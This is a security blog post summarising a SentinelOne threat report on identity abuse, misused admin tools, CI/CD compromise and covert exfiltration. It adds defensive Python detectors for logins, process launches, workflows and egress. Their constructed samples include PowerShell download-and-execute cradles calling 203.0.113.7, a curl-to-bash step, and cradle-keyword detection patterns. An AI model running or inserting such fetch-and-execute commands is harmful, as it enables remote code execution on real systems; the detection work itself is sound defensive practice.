SentinelOne Annual Threat Report: The Modern Breach Doesn’t Start With a Hack – It Starts With a Login

At Darkgate, we took a closer look at SentinelOne’s latest Annual Threat Report—not in the sense of dissecting every technical detail, but with a focus on understanding the broader patterns and structural shifts it highlights. What stands out quite quickly is that this report is less about isolated threats or malware statistics and more about how modern cyber intrusions actually unfold as a system.

One of the most noticeable shifts is the change in perspective. Instead of focusing purely on how attackers break into systems, the report emphasizes what happens after access is already established. This is where the concept of the “Identity Paradox” becomes central. The idea is straightforward but highly relevant: attackers increasingly operate using legitimate identities, making them appear indistinguishable from real users.

This becomes especially tangible in scenarios where stolen—or even formally validated—identities are used to gain access to corporate environments. In some cases, attackers are able to pass background checks and effectively act as insiders. Once inside, the distinction between legitimate behavior and malicious activity becomes extremely difficult to draw. A login from an unexpected location or through a VPN might raise a flag, yet the identity itself is recognized as valid. This creates a conflict between security signals and business validation, making detection significantly more complex.

What we found particularly interesting is that this dynamic extends beyond traditional user accounts and into the software supply chain. When a trusted developer account is compromised, for example, malicious code can be introduced into build pipelines without triggering immediate suspicion. Downstream systems continue to trust the output because the source appears legitimate. In this sense, attacks are no longer injected into systems; they are effectively built into them.
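If the credential itself is valid, the only signal left is the context around the login. The following is an added example, not code from the SentinelOne report or from Darkgate, of how that context can be scored against each user's own history: country, network (ASN), device and the speed implied by the distance from the previous session. The event format, the sample logins and the thresholds are constructed for illustration.

```python
"""Context scoring for logins that authenticated successfully.

Added example, not code from the SentinelOne report or from Darkgate. Event
format, baseline history and thresholds are constructed for illustration.
"""
from __future__ import annotations

from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime
from math import asin, cos, radians, sin, sqrt

# Assumed thresholds: faster than a commercial flight, or a jump with no time gap.
MAX_SPEED_KMH = 900.0
SAME_TIME_DISTANCE_KM = 50.0


@dataclass(frozen=True)
class Login:
    user: str
    ts: datetime
    country: str
    asn: str
    device_id: str
    lat: float
    lon: float


def parse(line: str) -> Login:
    """Parse one constructed CSV line: ts,user,country,asn,device,lat,lon."""
    ts, user, country, asn, device, lat, lon = line.split(",")
    return Login(user, datetime.fromisoformat(ts), country, asn, device,
                 float(lat), float(lon))


def distance_km(a: Login, b: Login) -> float:
    """Great-circle distance between two login locations (haversine)."""
    p1, p2 = radians(a.lat), radians(b.lat)
    dphi = p2 - p1
    dlam = radians(b.lon - a.lon)
    h = sin(dphi / 2) ** 2 + cos(p1) * cos(p2) * sin(dlam / 2) ** 2
    return 2 * 6371.0 * asin(sqrt(h))


def score(history: list[Login], login: Login) -> list[str]:
    """Return the reasons this login deviates from the user's own history."""
    reasons = []
    if login.country not in {h.country for h in history}:
        reasons.append("new_country")
    if login.asn not in {h.asn for h in history}:
        reasons.append("new_asn")
    if login.device_id not in {h.device_id for h in history}:
        reasons.append("new_device")
    last = max(history, key=lambda h: h.ts)
    hours = (login.ts - last.ts).total_seconds() / 3600
    dist = distance_km(last, login)
    if (hours > 0 and dist / hours > MAX_SPEED_KMH) or (hours <= 0 and dist > SAME_TIME_DISTANCE_KM):
        reasons.append("impossible_travel")
    return reasons


def analyze(lines) -> dict:
    """Build each user's baseline as the (chronological) log streams past and flag deviations."""
    history = defaultdict(list)
    findings = {}
    for line in lines:
        login = parse(line)
        past = history[login.user]
        if past:  # the first event for a user has nothing to compare against
            reasons = score(past, login)
            if reasons:
                findings[(login.user, login.ts.isoformat())] = reasons
        past.append(login)
    return findings


# Constructed sample: alice's normal pattern is Berlin over a domestic ASN on one
# device; the fourth event is Ashburn 90 minutes later on a new device and ASN.
# bob only switches device on an otherwise familiar network.
SAMPLE = """\
2024-03-04T08:02:11,alice,DE,AS3320,dev-a1,52.52,13.40
2024-03-05T08:10:43,alice,DE,AS3320,dev-a1,52.52,13.40
2024-03-06T07:58:02,alice,DE,AS3320,dev-a1,52.52,13.40
2024-03-06T09:30:00,alice,US,AS14618,dev-x9,39.04,-77.49
2024-03-06T09:45:00,bob,DE,AS3320,dev-b2,48.14,11.58
2024-03-06T10:05:00,bob,DE,AS3320,dev-b7,48.14,11.58
"""

if __name__ == "__main__":
    for key, reasons in analyze(SAMPLE.splitlines()).items():
        print(key, reasons)
```

None of these reasons on its own proves compromise; a new device after a hardware refresh is routine. The point is that a single login can carry several of them at once, and that the identity provider's own verdict ("valid credential, MFA satisfied") contributes nothing to the score.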

Another recurring theme throughout the report is the growing reliance on legitimate tools for malicious purposes. Instead of deploying custom malware, attackers increasingly leverage software that is already present within the environment. Remote management tools, administrative utilities, and even standard operating system components like PowerShell are used to execute attacks. Because these tools are part of normal operations, their use does not immediately appear suspicious, which makes detection far more difficult.

This becomes even more evident in scenarios involving social engineering. In some cases, attackers impersonate internal IT staff and convince users to install or run legitimate remote access tools. Combined with techniques such as voice phishing or coordinated email campaigns, this creates access that is technically clean and difficult to distinguish from normal IT support activity. Once established, this type of access can persist without triggering traditional malware alerts.

The report also highlights developments on the infrastructure side, particularly around edge systems. Components such as VPN concentrators, firewalls, and load balancers are often considered strong security anchors, yet they can also become blind spots if not properly managed. The notion of “Edge Decay” suggests a gradual loss of visibility and control over these systems. This is especially critical when combined with automated attack capabilities, where vulnerabilities can be discovered and exploited at scale within very short timeframes.
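Because the binaries in the two preceding paragraphs (PowerShell, remote management tools) are legitimate, hash- or signature-based detection has nothing to work with; what remains is how they are launched. The following is an added example, not code from the SentinelOne report or from Darkgate, that runs a few such launch-context rules over Sysmon-style process-creation events: encoded PowerShell command lines are decoded and inspected for download cradles, hidden windows are noted, and remote-access tools are flagged when their parent is anything other than the organisation's software-deployment agent. The event lines are constructed, and both the list of RMM binaries and the list of approved parents are assumptions to adapt to one's own environment.

```python
"""Flag legitimate tooling launched in ways normal operations rarely need.

Added example, not code from the SentinelOne report or from Darkgate. Event
lines are constructed; RMM_BINARIES and APPROVED_PARENTS are starting points.
"""
import base64
import re

# Well-known remote-access binaries; extend with whatever is legitimately in use.
RMM_BINARIES = {"anydesk.exe", "teamviewer.exe",
                "screenconnect.clientservice.exe", "quickassist.exe"}
# Assumed: software only arrives through the sanctioned deployment agents.
APPROVED_PARENTS = {"ccmexec.exe", "intunemanagementextension.exe"}

ENCODED = re.compile(r"(?:^|\s)-(?:encodedcommand|enc|ec|en|e)\s+([A-Za-z0-9+/=]{20,})", re.I)
HIDDEN = re.compile(r"-w(?:indowstyle)?\s+hidden\b", re.I)
CRADLE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b"
                    r"|invoke-expression|\biex\b|frombase64string", re.I)


def decode_encoded(cmdline: str):
    """Plaintext of a -EncodedCommand payload (base64 of UTF-16LE), or None."""
    m = ENCODED.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def analyze_event(parent: str, image: str, cmdline: str) -> list:
    reasons = []
    img, par = basename(image), basename(parent)
    if img in {"powershell.exe", "pwsh.exe"}:
        decoded = decode_encoded(cmdline)
        if decoded is not None:
            reasons.append("encoded_command")
        # Inspect the decoded text as well: the cradle usually hides inside it.
        if CRADLE.search(cmdline + " " + (decoded or "")):
            reasons.append("download_cradle")
        if HIDDEN.search(cmdline):
            reasons.append("hidden_window")
    if img in RMM_BINARIES and par not in APPROVED_PARENTS:
        reasons.append("rmm_outside_deployment_tooling")
    return reasons


def analyze(lines) -> list:
    """Events are 'ts|host|user|parent_image|image|cmdline'; cmdline may contain '|'."""
    findings = []
    for line in lines:
        ts, host, user, parent, image, cmdline = line.split("|", 5)
        reasons = analyze_event(parent, image, cmdline)
        if reasons:
            findings.append({"ts": ts, "host": host, "user": user,
                             "image": basename(image), "reasons": reasons})
    return findings


# Constructed sample. The encoded payload is built the way -EncodedCommand
# expects it (base64 over UTF-16LE) so the decoder can be exercised offline.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.7/a.ps1')"
ENC = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode("ascii")
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
OFFICE = "C:\\Program Files\\Microsoft Office\\root\\Office16\\"
SAMPLE = [
    "2024-03-06T09:31:02|ws-041|corp\\alice|C:\\Windows\\explorer.exe|" + PS
    + "|powershell.exe -NoProfile -File C:\\Scripts\\inventory.ps1",
    "2024-03-06T09:33:40|ws-041|corp\\alice|" + OFFICE + "WINWORD.EXE|" + PS
    + "|powershell.exe -NoP -W Hidden -Enc " + ENC,
    "2024-03-06T09:40:12|ws-017|corp\\bob|" + OFFICE + "OUTLOOK.EXE|"
    "C:\\Users\\bob\\Downloads\\AnyDesk.exe|AnyDesk.exe",
    "2024-03-06T09:41:55|ws-022|NT AUTHORITY\\SYSTEM|C:\\Windows\\CCM\\CcmExec.exe|"
    "C:\\Program Files (x86)\\ScreenConnect Client\\ScreenConnect.ClientService.exe|"
    "ScreenConnect.ClientService.exe",
    "2024-03-06T09:47:30|ws-017|corp\\bob|C:\\Windows\\System32\\svchost.exe|" + PS
    + "|powershell -nop -c \"Invoke-WebRequest http://203.0.113.7/x | iex\"",
]

if __name__ == "__main__":
    for f in analyze(SAMPLE):
        print(f["ts"], f["host"], f["image"], ", ".join(f["reasons"]))
```

The fourth event, an RMM client started by the SCCM agent, produces nothing, while the same family of binary started from Outlook does: the rule encodes "how did this get here", which is exactly the question the help-desk impersonation scenario turns on. The first PowerShell launch is likewise silent, so ordinary scripting is not penalised for being PowerShell.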

A similar shift can be observed in development and production environments. Under the concept of “Living off the Pipeline,” the report outlines how attackers are targeting CI/CD processes and build systems. By embedding malicious logic directly into development workflows, they bypass traditional runtime defenses entirely. The result is that compromised software is distributed as part of normal deployment processes, making detection significantly more challenging.
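The three places where a pipeline inherits code it never reviewed are a third-party action referenced by a mutable tag, an install script piped straight from the network into a shell, and a workflow that runs on `pull_request_target` while checking out the pull request's own head. The following is an added example, not code from the SentinelOne report, from Darkgate or from GitHub, that audits a GitHub Actions workflow for these three patterns with line-oriented checks and shows a pinned counterpart. Both workflows are constructed, and the 40-hex commit SHA in the second one is a placeholder, not a real `actions/checkout` commit.

```python
"""Audit a GitHub Actions workflow for places where pipeline trust is assumed.

Added example, not code from the SentinelOne report, from Darkgate or from
GitHub. The workflows are constructed; the 40-hex SHA is a placeholder.
"""
import re

USES = re.compile(r"^\s*-?\s*uses:\s*([^\s#]+)")
PIPE_TO_SHELL = re.compile(r"\b(?:curl|wget)\b[^|]*\|\s*(?:sudo\s+)?(?:ba)?sh\b")
PR_TARGET = re.compile(r"^\s*pull_request_target\s*:", re.M)
FORK_HEAD = re.compile(r"github\.event\.pull_request\.head\.(?:sha|ref)")
FULL_SHA = re.compile(r"^[0-9a-f]{40}$")


def audit_workflow(text: str) -> list:
    """Return (rule, detail) pairs for the workflow text."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = USES.match(line)
        if m:
            ref = m.group(1)
            if not ref.startswith(("./", "docker://")):  # local actions/images judged elsewhere
                _, _, version = ref.partition("@")
                # A tag or branch can be moved by whoever controls the action repo;
                # only a full commit SHA pins what actually runs.
                if not FULL_SHA.match(version):
                    findings.append(("unpinned_action", f"line {lineno}: {ref}"))
        if PIPE_TO_SHELL.search(line):
            findings.append(("pipe_to_shell", f"line {lineno}: {line.strip()}"))
    # pull_request_target runs with the base repo's secrets; checking out the PR
    # head there executes untrusted fork code with those secrets in scope.
    if PR_TARGET.search(text) and FORK_HEAD.search(text):
        findings.append(("pr_target_runs_fork_code",
                         "pull_request_target combined with checkout of the PR head"))
    return findings


# Constructed workflow with all three problems.
RISKY = """\
name: build
on:
  pull_request_target:
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          ref: ${{ github.event.pull_request.head.sha }}
      - uses: some-org/setup-tool@main
      - run: curl -sSL https://example.invalid/install.sh | bash
      - run: make build
"""

# Constructed counterpart: push trigger, SHA-pinned action (placeholder SHA),
# no network-to-shell step.
PINNED = """\
name: build
on:
  push:
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@0123456789abcdef0123456789abcdef01234567  # placeholder SHA
      - run: make build
"""

if __name__ == "__main__":
    for rule, detail in audit_workflow(RISKY):
        print(f"{rule}: {detail}")
    print("pinned workflow findings:", audit_workflow(PINNED))
```

The checks are deliberately line-based so they run without a YAML parser; a multi-line `run: |` block with the pipe on its own line would slip past `PIPE_TO_SHELL`, which is the first thing to extend when applying this to real repositories.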

When it comes to data exfiltration, the pattern continues. Instead of using clearly malicious channels, attackers increasingly rely on legitimate cloud infrastructure to move data. Traffic routed through trusted providers or standard protocols such as HTTPS blends into normal operations. In some cases, the reputation of well-known platforms is deliberately used to mask malicious activity, allowing large volumes of data to leave the environment without immediate detection.

Another area that deserves attention is the growing role of APIs and interconnected systems. Modern IT environments rely heavily on integrations between services, often through APIs that are not always fully documented or monitored. The report refers to this as the “API Shadow”—a layer of communication that exists beneath the surface of visible infrastructure. These hidden pathways can enable lateral movement and data access without triggering traditional security controls.
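Both of the preceding paragraphs come down to the same log: outbound HTTP requests whose destinations are reputable and whose transport is plain HTTPS. The following is an added example, not code from the SentinelOne report or from Darkgate, that takes two views over one such log. The first compares every request against the documented API surface and reports method/path pairs the documentation does not know about (the "API Shadow" in the report's terms). The second ignores destination reputation entirely and asks whether a user's upload volume to a given provider has outgrown that user's own earlier days. The log lines, the documented endpoint list, the host names and the thresholds are all constructed.

```python
"""Two views over one outbound HTTP log: undocumented API endpoints, and upload
volume that outgrows a user's own baseline.

Added example, not code from the SentinelOne report or from Darkgate. Log
lines, host names, the endpoint list and the thresholds are constructed.
"""
import re
from collections import defaultdict
from statistics import mean

INTERNAL_API_HOST = "api.internal.example"  # assumed name of the documented API
# Assumed documented surface; {id} stands for one path segment.
DOCUMENTED = ["GET /v1/users/{id}", "POST /v1/orders", "GET /v1/orders/{id}"]

# Constructed log: date user method host path bytes_sent_by_client
SAMPLE = """\
2024-03-04 alice GET api.internal.example /v1/users/42 1200
2024-03-04 alice PUT files.cloudprovider.example /u/alice/report.pdf 2000000
2024-03-05 alice PUT files.cloudprovider.example /u/alice/q1.xlsx 3000000
2024-03-06 alice GET api.internal.example /internal/export/customers 900
2024-03-06 alice PUT files.cloudprovider.example /u/alice/export.zip 420000000
2024-03-04 bob POST api.internal.example /v1/orders 800
2024-03-06 bob DELETE api.internal.example /v1/orders/7 300
2024-03-06 bob PUT files.cloudprovider.example /u/bob/notes.txt 5000
"""


def parse(lines) -> list:
    events = []
    for line in lines:
        if not line.strip():
            continue
        date, user, method, host, path, bytes_out = line.split()
        events.append({"date": date, "user": user, "method": method,
                       "host": host, "path": path, "bytes_out": int(bytes_out)})
    return events


def compile_spec(spec) -> list:
    """Turn 'METHOD /path/{param}' entries into (method, regex) pairs."""
    compiled = []
    for entry in spec:
        method, path = entry.split(" ", 1)
        parts = re.split(r"\{[^}]+\}", path)  # split on placeholders before escaping
        compiled.append((method, re.compile("^" + "[^/]+".join(map(re.escape, parts)) + "$")))
    return compiled


def shadow_endpoints(events, spec, host=INTERNAL_API_HOST) -> list:
    """Method/path pairs observed on the API host that no documented entry covers."""
    compiled = compile_spec(spec)
    seen = set()
    for ev in events:
        if ev["host"] != host:
            continue
        if not any(m == ev["method"] and p.match(ev["path"]) for m, p in compiled):
            seen.add((ev["method"], ev["path"]))
    return sorted(seen)


def bulk_egress(events, factor=5.0, floor=50_000_000, internal_host=INTERNAL_API_HOST) -> list:
    """Days on which a user's upload bytes to one external host exceed both
    `factor` times the mean of that user's earlier days there and `floor` bytes.
    Destination reputation is deliberately not an input."""
    daily = defaultdict(lambda: defaultdict(int))
    for ev in events:
        if ev["host"] == internal_host:
            continue
        daily[(ev["user"], ev["host"])][ev["date"]] += ev["bytes_out"]
    flagged = []
    for (user, host), per_day in daily.items():
        dates = sorted(per_day)
        for i, date in enumerate(dates[1:], 1):  # the first day has no baseline
            baseline = mean(per_day[d] for d in dates[:i])
            total = per_day[date]
            if total > factor * baseline and total > floor:
                flagged.append((user, host, date, total, baseline))
    return flagged


if __name__ == "__main__":
    events = parse(SAMPLE.splitlines())
    print("undocumented:", shadow_endpoints(events, DOCUMENTED))
    print("bulk egress:", bulk_egress(events))
```

Two details carry the argument. `DELETE /v1/orders/7` is flagged even though the path is documented, because the documented method is `GET`; the shadow surface is defined by method and path together. And bob's single day of uploads produces nothing, since with no earlier days there is no baseline to compare against: the rule reports deviation from the user's own habit, not absolute size, which is what distinguishes it from a simple byte threshold.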

What emerges from all of this is a picture of attacks that are far less visible than in the past, but significantly more integrated into existing systems. Instead of breaking through defenses, attackers increasingly operate within them. They leverage trust—whether in identities, tools, processes, or infrastructure—as a primary attack vector.

Our overall impression, even without going into every technical detail, is that the biggest challenge today lies not in preventing access, but in understanding what actually happens within a system once access has been granted. If malicious activity looks like normal behavior, traditional security approaches will inevitably struggle.

This aligns with what we continue to observe across real-world environments. The complexity of modern IT ecosystems creates not only opportunities, but also uncertainty—especially in areas where trust is assumed rather than verified. And it is precisely this trust that appears to be increasingly targeted.

The SentinelOne report does not provide simple answers, but it clearly indicates the direction in which the conversation is moving: away from isolated security measures, and toward a more holistic understanding of systems, processes, and how they interact under real-world conditions.


Darkgate Editorial Team